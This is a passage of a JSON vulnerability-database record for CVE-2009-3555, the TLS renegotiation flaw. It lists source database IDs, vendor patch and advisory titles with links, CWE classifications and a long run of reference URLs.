"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "84181",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-67231",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-41001",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2009-3555",
"trust": 0.1
},
{
"db": "SECUNIA",
"id": "44293",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "100761",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "89026",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "111583",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "101257",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119293",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "91749",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "111920",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#120541"
},
{
"db": "VULHUB",
"id": "VHN-41001"
},
{
"db": "VULMON",
"id": "CVE-2009-3555"
},
{
"db": "BID",
"id": "36935"
},
{
"db": "PACKETSTORM",
"id": "89136"
},
{
"db": "PACKETSTORM",
"id": "130868"
},
{
"db": "PACKETSTORM",
"id": "100761"
},
{
"db": "PACKETSTORM",
"id": "89026"
},
{
"db": "PACKETSTORM",
"id": "111583"
},
{
"db": "PACKETSTORM",
"id": "101257"
},
{
"db": "PACKETSTORM",
"id": "119293"
},
{
"db": "PACKETSTORM",
"id": "92095"
},
{
"db": "PACKETSTORM",
"id": "120365"
},
{
"db": "PACKETSTORM",
"id": "83415"
},
{
"db": "PACKETSTORM",
"id": "91749"
},
{
"db": "PACKETSTORM",
"id": "111920"
},
{
"db": "PACKETSTORM",
"id": "83271"
},
{
"db": "CNNVD",
"id": "CNNVD-200911-069"
},
{
"db": "NVD",
"id": "CVE-2009-3555"
}
]
},
"id": "VAR-200911-0398",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-41001"
}
],
"trust": 0.6623591435714286
},
"last_update_date": "2026-03-09T22:17:46.450000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Security Update for Windows XP (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39675"
},
{
"title": "Security Update for Windows Server 2003 for Itanium-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39679"
},
{
"title": "Security Update for Windows Server 2008 x64 Edition (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39683"
},
{
"title": "Security Update for Windows Server 2008 R2 for Itanium-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39687"
},
{
"title": "Security Update for Windows Server 2003 (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39615"
},
{
"title": "Security Update for Windows Vista for x64-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39619"
},
{
"title": "Security Update for Windows 7 (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39623"
},
{
"title": "Security Update for Windows Server 2008 R2 x64 Edition (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39626"
},
{
"title": "Security Update for Windows Server 2003 x64 Edition (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39678"
},
{
"title": "Security Update for Windows Server 2008 (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39682"
},
{
"title": "Security Update for Windows 7 for x64-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39686"
},
{
"title": "Security Update for Windows XP x64 Edition (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39614"
},
{
"title": "Security Update for Windows Vista (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39618"
},
{
"title": "Security Update for Windows Server 2008 for Itanium-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39622"
},
{
"title": "Security Update for Windows Server 2003 (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39677"
},
{
"title": "Security Update for Windows Vista for x64-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39681"
},
{
"title": "Security Update for Windows 7 (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39685"
},
{
"title": "Security Update for Windows XP (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39613"
},
{
"title": "Security Update for Windows Server 2003 for Itanium-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39617"
},
{
"title": "Security Update for Windows Server 2008 x64 Edition (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39621"
},
{
"title": "Security Update for Windows Server 2008 R2 for Itanium-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39625"
},
{
"title": "Security Update for Windows XP x64 Edition (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39676"
},
{
"title": "Security Update for Windows Vista (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39680"
},
{
"title": "Security Update for Windows Server 2008 for Itanium-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39684"
},
{
"title": "Security Update for Windows Server 2008 R2 x64 Edition (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39688"
},
{
"title": "Security Update for Windows Server 2003 x64 Edition (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39616"
},
{
"title": "Security Update for Windows Server 2008 (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39620"
},
{
"title": "Security Update for Windows 7 for x64-based Systems (KB980436)",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=39624"
},
{
"title": "Thunderbird Setup 3.1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=4468"
},
{
"title": "FirefoxChinaEdition 2010.7",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=4472"
},
{
"title": "FirefoxChinaEdition 2010.7",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=4471"
},
{
"title": "thunderbird-3.1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=4470"
},
{
"title": "Thunderbird 3.1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=4469"
},
{
"title": "FirefoxChinaEdition 2010.7",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=4473"
},
{
"title": "Red Hat: Moderate: gnutls security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100167 - Security Advisory"
},
{
"title": "Red Hat: Moderate: httpd and httpd22 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100011 - Security Advisory"
},
{
"title": "Red Hat: Moderate: java-1.4.2-ibm security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100155 - Security Advisory"
},
{
"title": "Red Hat: Moderate: openssl097a security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100164 - Security Advisory"
},
{
"title": "Red Hat: Moderate: nss security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100165 - Security Advisory"
},
{
"title": "Red Hat: Moderate: gnutls security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100166 - Security Advisory"
},
{
"title": "Red Hat: Important: openssl security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100162 - Security Advisory"
},
{
"title": "Red Hat: Moderate: openssl security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100163 - Security Advisory"
},
{
"title": "Red Hat: Low: JBoss Enterprise Web Server 1.0.1 update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100119 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: nss vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-927-6"
},
{
"title": "Ubuntu Security Notice: apache2 vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-990-2"
},
{
"title": "Ubuntu Security Notice: nss vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-927-1"
},
{
"title": "Ubuntu Security Notice: openssl vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-990-1"
},
{
"title": "Ubuntu Security Notice: nss vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-927-4"
},
{
"title": "Cisco: Transport Layer Security Renegotiation Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20091109-tls"
},
{
"title": "Ubuntu Security Notice: apache2 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-860-1"
},
{
"title": "Red Hat: Moderate: java-1.5.0-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100130 - Security Advisory"
},
{
"title": "Cisco: Transport Layer Security Renegotiation Remote Man-in-the-Middle Attack Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=Cisco-SA-20091105-CVE-2009-3555"
},
{
"title": "Debian CVElist Bug Report Logs: \"slowloris\" denial-of-service vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5ed45f95901af77f1f752912d098b48e"
},
{
"title": "Debian Security Advisories: DSA-2141-1 openssl -- SSL/TLS insecure renegotiation protocol design flaw",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=1c00cc4c6dbe7bb057db61e10ff97d6d"
},
{
"title": "Debian Security Advisories: DSA-2626-1 lighttpd -- several issues",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=885d01db2c0276e75192acacb224a6e8"
},
{
"title": "Debian CVElist Bug Report Logs: Not possible to disable SSLv3",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=cd46735759deed658e1e15bd89794f91"
},
{
"title": "Debian Security Advisories: DSA-1934-1 apache2 -- multiple issues",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a5a134c3483f034e2df5ced5ad7428ec"
},
{
"title": "Debian Security Advisories: DSA-3253-1 pound -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ad76a2fc91623114f1aaa478b7ecbe12"
},
{
"title": "Debian CVElist Bug Report Logs: polarssl: CVE-2013-4623: Denial of Service through Certificate message during handshake",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=48a9651e9438ab2ad49c32956a8040ab"
},
{
"title": "Mozilla: Mozilla Foundation Security Advisory 2010-22",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=mozilla_advisories\u0026qid=2010-22"
},
{
"title": "Debian CVElist Bug Report Logs: polarssl: CVE-2013-5914 CVE-2013-5915",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=3ea56f82629f8bb9aeeedb7aa86eb416"
},
{
"title": "Symantec Security Advisories: SA44 : TLS/SSLv3 renegotiation (CVE-2009-3555)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=92adf6d8db72928bb63961cc8473a936"
},
{
"title": "Red Hat: Critical: java-1.4.2-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100786 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: polarssl: CVE-2009-3555",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d154eb6a1f821c737dadd179519e99ce"
},
{
"title": "Red Hat: Important: java-1.6.0-openjdk security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100339 - Security Advisory"
},
{
"title": "Red Hat: Important: java-1.6.0-openjdk security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100768 - Security Advisory"
},
{
"title": "Citrix Security Bulletins: Transport Layer Security Renegotiation Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=d26786915d99808385e93927bb7516fd"
},
{
"title": "Citrix Security Bulletins: Vulnerability in Citrix Online Plug-ins and ICA Clients Could Result in SSL/TLS Certificate Spoofing",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=8a0ec21ac35be2b30e769ff0af90fa26"
},
{
"title": "Red Hat: Critical: java-1.5.0-sun security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100338 - Security Advisory"
},
{
"title": "Red Hat: Critical: java-1.6.0-sun security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100337 - Security Advisory"
},
{
"title": "Red Hat: Critical: java-1.6.0-ibm security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20091694 - Security Advisory"
},
{
"title": "Red Hat: Critical: java-1.6.0-sun security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20100770 - Security Advisory"
},
{
"title": "VMware Security Advisories: VMware ESX third party updates for Service Console",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=d7005a2e6744b7e4f77d0105454de35d"
},
{
"title": "Ubuntu Security Notice: openjdk-6 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-923-1"
},
{
"title": "VMware Security Advisories: VMware ESX third party updates for Service Console",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=d8e6425b0cb8b545dc1e50945dafb2c0"
},
{
"title": "Ubuntu Security Notice: openjdk-6, openjdk-6b18 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1010-1"
},
{
"title": "Symantec Security Advisories: SA50 : Multiple SSL/TLS vulnerabilities in Reporter",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e934b8269c86666c1ebc108ca0e3d35"
},
{
"title": "Symantec Security Advisories: SA61 : Director multiple Apache vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=508649a9a651b4fb32a5cc0f1310d652"
},
{
"title": "VMware Security Advisories: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=ea953b0a91a1816979ec1d304d5e3d93"
},
{
"title": "DPSSLClientProfile",
"trust": 0.1,
"url": "https://github.com/ADesprets/DPSSLClientProfile "
},
{
"title": "letsencrypt-lighttpd",
"trust": 0.1,
"url": "https://github.com/galeone/letsencrypt-lighttpd "
},
{
"title": "igrill-smoker",
"trust": 0.1,
"url": "https://github.com/kins-dev/igrill-smoker "
},
{
"title": "hanase",
"trust": 0.1,
"url": "https://github.com/ekiojp/hanase "
},
{
"title": "CVE-HOWTO",
"trust": 0.1,
"url": "https://github.com/RedHatProductSecurity/CVE-HOWTO "
},
{
"title": "pulse-secure-vpn-mitm-research",
"trust": 0.1,
"url": "https://github.com/withdk/pulse-secure-vpn-mitm-research "
},
{
"title": "pulse-secure-vpn-mitm-research",
"trust": 0.1,
"url": "https://github.com/withdk/pulse-secure-mitm-research "
},
{
"title": "ReconScan",
"trust": 0.1,
"url": "https://github.com/GiJ03/ReconScan "
},
{
"title": "ReconScan",
"trust": 0.1,
"url": "https://github.com/RoliSoft/ReconScan "
},
{
"title": "test",
"trust": 0.1,
"url": "https://github.com/issdp/test "
},
{
"title": "ReconScan",
"trust": 0.1,
"url": "https://github.com/kira1111/ReconScan "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2009-3555"
},
{
"db": "CNNVD",
"id": "CNNVD-200911-069"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-295",
"trust": 1.1
},
{
"problemtype": "CWE-310",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41001"
},
{
"db": "NVD",
"id": "CVE-2009-3555"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.8,
"url": "http://extendedsubset.com/?p=8"
},
{
"trust": 2.6,
"url": "http://support.citrix.com/article/ctx123359"
},
{
"trust": 2.5,
"url": "http://www.links.org/?p=780"
},
{
"trust": 2.5,
"url": "http://www.links.org/?p=786"
},
{
"trust": 2.5,
"url": "http://www.links.org/?p=789"
},
{
"trust": 2.5,
"url": "http://blogs.iss.net/archive/sslmitmiscsrf.html"
},
{
"trust": 2.5,
"url": "http://www.ietf.org/mail-archive/web/tls/current/msg03948.html"
},
{
"trust": 2.5,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=533125"
},
{
"trust": 2.5,
"url": "https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt"
},
{
"trust": 2.5,
"url": "http://www.educatedguesswork.org/2009/11/understanding_the_tls_renegoti.html"
},
{
"trust": 2.3,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-274990-1"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/36935"
},
{
"trust": 2.3,
"url": "http://www.debian.org/security/2009/dsa-1934"
},
{
"trust": 2.3,
"url": "http://www.debian.org/security/2011/dsa-2141"
},
{
"trust": 2.3,
"url": "http://www.debian.org/security/2015/dsa-3253"
},
{
"trust": 2.3,
"url": "http://www.vmware.com/security/advisories/vmsa-2010-0019.html"
},
{
"trust": 2.3,
"url": "http://www.vmware.com/security/advisories/vmsa-2011-0003.html"
},
{
"trust": 2.3,
"url": "http://www.vmware.com/support/vsphere4/doc/vsp_vc41_u1_rel_notes.html"
},
{
"trust": 2.1,
"url": "http://www.kb.cert.org/vuls/id/120541"
},
{
"trust": 2.0,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-273029-1"
},
{
"trust": 2.0,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1pm12247"
},
{
"trust": 2.0,
"url": "http://lists.gnu.org/archive/html/gnutls-devel/2009-11/msg00029.html"
},
{
"trust": 2.0,
"url": "http://www.ietf.org/mail-archive/web/tls/current/msg03928.html"
},
{
"trust": 2.0,
"url": "http://blogs.sun.com/security/entry/vulnerability_in_tls_protocol_during"
},
{
"trust": 2.0,
"url": "http://support.avaya.com/css/p8/documents/100081611"
},
{
"trust": 2.0,
"url": "http://support.avaya.com/css/p8/documents/100114315"
},
{
"trust": 2.0,
"url": "http://support.avaya.com/css/p8/documents/100114327"
},
{
"trust": 2.0,
"url": "http://support.zeus.com/zws/media/docs/4.3/release_notes"
},
{
"trust": 2.0,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21426108"
},
{
"trust": 2.0,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21432298"
},
{
"trust": 2.0,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24025312"
},
{
"trust": 2.0,
"url": "http://www.arubanetworks.com/support/alerts/aid-020810.txt"
},
{
"trust": 2.0,
"url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs10-030/index.html"
},
{
"trust": 2.0,
"url": "http://www.ingate.com/relnote.php?ver=481"
},
{
"trust": 2.0,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-22.html"
},
{
"trust": 2.0,
"url": "http://www.openoffice.org/security/cves/cve-2009-3555.html"
},
{
"trust": 2.0,
"url": "http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html"
},
{
"trust": 2.0,
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html"
},
{
"trust": 2.0,
"url": "http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html"
},
{
"trust": 2.0,
"url": "http://www.proftpd.org/docs/release_notes-1.3.2c"
},
{
"trust": 2.0,
"url": "http://www.securegoose.org/2009/11/tls-renegotiation-vulnerability-cve.html"
},
{
"trust": 2.0,
"url": "https://support.f5.com/kb/en-us/solutions/public/10000/700/sol10737.html"
},
{
"trust": 1.9,
"url": "https://kb.bluecoat.com/index?page=content\u0026id=sa50"
},
{
"trust": 1.7,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-77-1021653.1-1"
},
{
"trust": 1.7,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-77-1021752.1-1"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1023148"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023163"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023204"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023205"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023206"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023207"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023208"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023209"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023210"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023211"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023212"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023213"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023214"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023215"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023216"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023217"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023218"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023219"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023224"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023243"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023270"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023271"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023272"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023273"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023274"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023275"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023411"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023426"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023427"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1023428"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1024789"
},
{
"trust": 1.7,
"url": "http://www.cisco.com/en/us/products/products_security_advisory09186a0080b01d1d.shtml"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2009/nov/139"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/507952/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/508075/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/508130/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/515055/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/516397/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-11/0120.html"
},
{
"trust": 1.7,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-273350-1"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37291"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37292"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37320"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37383"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37399"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37453"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37501"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37504"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37604"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37640"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37656"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37675"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/37859"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/38003"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/38020"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/38056"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/38241"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/38484"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/38687"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/38781"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39127"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39136"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39242"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39243"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39278"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39292"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39317"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39461"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39500"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39628"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39632"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39713"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/39819"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/40070"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/40545"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/40747"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/40866"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/41480"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/41490"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/41818"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/41967"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/41972"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/42377"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/42379"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/42467"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/42724"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/42733"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/42808"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/42811"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/42816"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/43308"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/44183"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/44954"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/48577"
},
{
"trust": 1.7,
"url": "http://osvdb.org/60521"
},
{
"trust": 1.7,
